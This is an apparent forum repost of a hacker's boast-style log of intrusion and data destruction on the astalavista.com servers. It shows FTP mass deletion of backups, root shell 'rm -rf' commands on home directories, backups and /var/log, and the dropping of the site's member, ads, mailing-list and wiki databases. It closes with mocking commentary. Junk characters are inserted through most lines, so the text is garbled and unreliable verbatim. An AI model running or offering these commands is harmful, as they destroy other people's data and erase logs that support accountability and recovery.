# R) W0 |8 z) c150 Opening BINARY mode data connection for ‘file list’.7 o; i6 `, d" g: Y4 S5 M2 `
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
2 i- M$ Z8 J- P" h" K# g& e# G: f. `-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
% F% j& y0 n0 y-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
. j+ f4 M5 _9 |, |" g-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
7 \7 G6 X4 S' ^( G2 }7 m {3 f-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
: Y' F. J8 d" V[snip]4 `$ ~, ^# [0 L% ^ i8 c7 |$ ~% X
226 Transfer complete.# [: E- ?* @6 b- x7 @6 |
ftp> mdelete *
& d1 U% ?9 L, k- N) vftp> ls -la) s1 [) o8 H! F1 \
227 Entering Passive Mode (212,254,194,163,2,193)" M) ^8 `6 I! P7 M" }, A
150 Opening BINARY mode data connection for ‘file list’.
4 ^$ V' A+ Y: Y3 u7 J3 w. I226 Transfer complete.
- U4 P, Q6 E3 C2 Gftp>
8 e' {, R, c g6 s( j
" k+ M! Q6 B2 \. g, F! \sh-3.2# cd /home! h0 G7 H+ G1 E J9 i
sh-3.2# ls -la
$ h3 w3 j3 x! G1 n/ [! e. T9 Rtotal 120
' b8 z! ]8 \5 ^% \+ gdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .5 G4 R1 @3 k5 M& V: j# s) l! n
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
. w/ ]* s/ F7 X( M B5 jdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
. W8 v |1 H' ?" P; b-rw——- 1 root root 8192 Jun 4 03:03 aquota.group# X. s. M) N6 n: }& N
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
8 E, ?1 P: u% X; j. s3 e* edrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
) M u+ s! a9 ~1 o! }7 `% Vdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup1 j$ M+ a3 b3 a, [
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161. D# u5 g7 _+ _ f3 J7 F3 J& u9 _
drwx–x–x 10 com com 4096 Apr 28 12:40 com4 g9 R! H/ Q1 \8 U
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
7 i3 D ]. ?- e7 ^drwx—— 3 jon jon 4096 Sep 21 2007 jon
' O: I' p3 q5 N$ R% O6 Fdrwx—— 2 root root 16384 Sep 11 2007 lost+found w- p. W; B& x- E, j' E; ~8 h
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
9 {% i w8 z0 I- j% X' F2 \, ydrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
0 y# y* R" \* j4 vdrwx—— 2 jon jon 4096 Sep 15 2007 test5 B: m- r" c$ ?
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp4 ?4 c, M& E9 D! c4 D& X
& }; h" d* s8 u& N9 xsh-3.2# rm -rf backup/' @7 |8 r6 X+ t! ^6 M7 a2 E8 A3 X7 C
sh-3.2# rm -rf backup.14161/( |6 h# @2 U ^2 W
sh-3.2# rm -rf ftp/$ s3 X. n; Q4 i: u* w1 W) L$ W
sh-3.2# rm -rf jon/
0 e& X+ P$ i4 \sh-3.2# rm -rf my/
) \$ M( t1 @# s5 X* r. v1 nsh-3.2# rm -rf mysqldata/( g7 a* l" C) E1 L% A8 a
sh-3.2# rm -rf test/; G& P! `4 [8 m: f. R" F
sh-3.2# rm -rf tmp/0 }- [% @" \0 |: S. g w
sh-3.2# cd ~- Q9 }6 L' D- p
sh-3.2# rm -rf *9 ~( ?" P. D* s5 v
sh-3.2# rm -rf /var/log// X! }. r6 K X$ a2 a
rm: cannot remove directory `/var/log//proftpd’: Directory not empty
4 S4 }; x% l- `7 W1 `0 esh-3.2# rm -rf /home/*
7 `+ M8 Y9 q' N" E! psh-3.2# mysql9 p* m2 w/ x( X1 N( N: L
Welcome to the MySQL monitor. Commands end with ; or \g.+ a; @% {$ ]4 W h6 q6 p$ Z
Your MySQL connection id is 407156
! D3 J- E4 G9 o8 ZServer version: 5.0.45-community-log MySQL Community Edition (GPL): P% A7 f+ o- A1 |
8 T& n4 d3 v' q1 W( C
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
. w( }% B ?4 |; v' I
" f. j! Q4 \4 _" }mysql> show databases;: u6 P8 F! ?6 l! a. G! L7 P8 ]
+———————–+' \' X6 O: }3 Y
| Database |
! h0 U' J3 T3 }0 n( E' H! i/ L+———————–+
2 G5 d& Q! N7 E1 v" }5 q| information_schema |
5 @1 ~" P+ G: i; G2 y: J| astanet_ads |# _; c) ^' a6 W4 n
| astanet_mailing_lists |& [1 D+ O8 v/ f3 Y, P: x7 y6 a
| astanet_mediawiki |) Q4 Q2 ~- C2 V2 ^ ?, j
| astanet_membersystem | P4 o$ e" n" W7 t. t' T
| com_contrexx |/ Q% w$ X% ^/ A0 _$ a' r! b
| com_contrexx2 |3 s. d B8 H8 |1 D0 r
| com_contrexx2_live |. J1 Q% C3 O3 W" O7 p
| da_roundcube |- z/ P8 n9 r2 V4 @! k
| dolphin |. }# @, [! S# Z1 h* S. B
| ideapool |7 V" k, f, A7 d& q7 F$ H
| mysql |
( x ~; i: {6 }& J| test |( l# p" ^( v* _' M+ M5 P8 u5 v
| yourmaster |
" U% l* F! b4 h, p" T+———————–+
6 L8 f. ^! h$ x* R/ w$ y& t+ @) w14 rows in set (0.03 sec)
" N' U4 B) {3 N; Y& H) P$ Q7 m2 i7 i& u2 _$ Y9 g6 P
mysql> drop database astanet_membersystem;
# E7 \) |% W( h, R2 v* E7 K8 `droQuery OK, 46 rows affected (0.81 sec)
; I; n7 I* m2 C: o& t! o( i8 }4 m: X- ~
mysql> drop database com_contrexx;
, S: y5 j/ C' {, aQuery OK, 211 rows affected (2.72 sec)
3 q/ W/ Q* D9 l8 ? q
8 w3 h+ u9 ?# A; W8 }3 Amysql> drop database com_contrexx2;
/ r* d! z. Z) lQuery OK, 237 rows affected (2.23 sec)/ M" h5 ?# i2 x# _7 b8 L1 R$ J
a3 o7 [* A. l+ d7 F
mysql> drop database com_contrexx2_live;
, z) g- {3 L, y b6 O( J: f' f( Q2 ]Query OK, 227 rows affected (7.63 sec)9 N" ]6 S+ ^3 z$ f8 ~: }7 r
3 y( k. I3 \5 n. A: E+ M( Y8 }; {
mysql> drop database ideapool;( l$ `; M/ a3 B- W8 n
Query OK, 69 rows affected (0.19 sec)
& B0 d. F( \+ X' R. c& E8 m3 ]7 |: m6 L
mysql> drop database yourmaster;
! F* G; P1 P6 a" u/ UQuery OK, 158 rows affected (0.55 sec)& J4 Z& }& j! U3 ? s
' s, H- F6 n5 s* L+ cmysql> drop database astanet_ads;- i3 [) m2 `& a5 L9 I. h. [. G- c6 ~
Query OK, 9 rows affected (0.11 sec)2 d5 ?9 q3 ^4 Z. E+ x% p8 K- m: ~! p
, z7 C/ N9 Q# c! `1 i6 x/ amysql> drop database astanet_mailing_lists;3 a8 n2 e' T& y- i. @
Query OK, 24 rows affected (1.47 sec)
}8 C1 x1 ~+ \5 e) @) P0 D R3 [: K8 R3 \0 @" _5 I
mysql> drop database astanet_mediawiki;
) i3 M& g$ R+ bQuery OK, 31 rows affected (0.51 sec)
" d7 Y; ^' f3 e) q8 }
# D7 U5 L) b% J5 V* O6 d$ @6 Kmysql> show databases;& ]! }% G6 X& o/ ~8 z2 [5 `
+——————–+& j" I6 F; O- L5 y2 `
| Database |
' f. E" {! \: Y+ f: z0 `' A+——————–+, @; a( O% ]; K# S4 p0 P
| information_schema |
6 {: }6 |; H$ w3 c| da_roundcube |
, d# o2 v+ F/ v& p| dolphin |! l( p9 G5 V/ G3 b$ E# ~4 U E5 f$ K
| mysql |- @3 _ B/ B" @1 e
| test |
2 J3 o1 T' v! S" [9 V2 @! H2 @+——————–+7 ?+ B+ B1 B6 }9 W3 y$ U
5 rows in set (0.00 sec)8 A) r& S8 o5 n9 C9 E
) a7 g; D0 h5 l7 J. ]
What a journey! We’re not sure exactly why the “Terminator” had any influence on' _/ l; r/ W5 ]1 h4 ?3 T8 K9 l( s
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
h+ i3 Q3 T+ K$ ?! K. iwrong to say this pack of morons *wont be back*.
i9 v$ `1 m* G6 d |
发表于 2012-11-6 21:07:34
收藏
支持
反对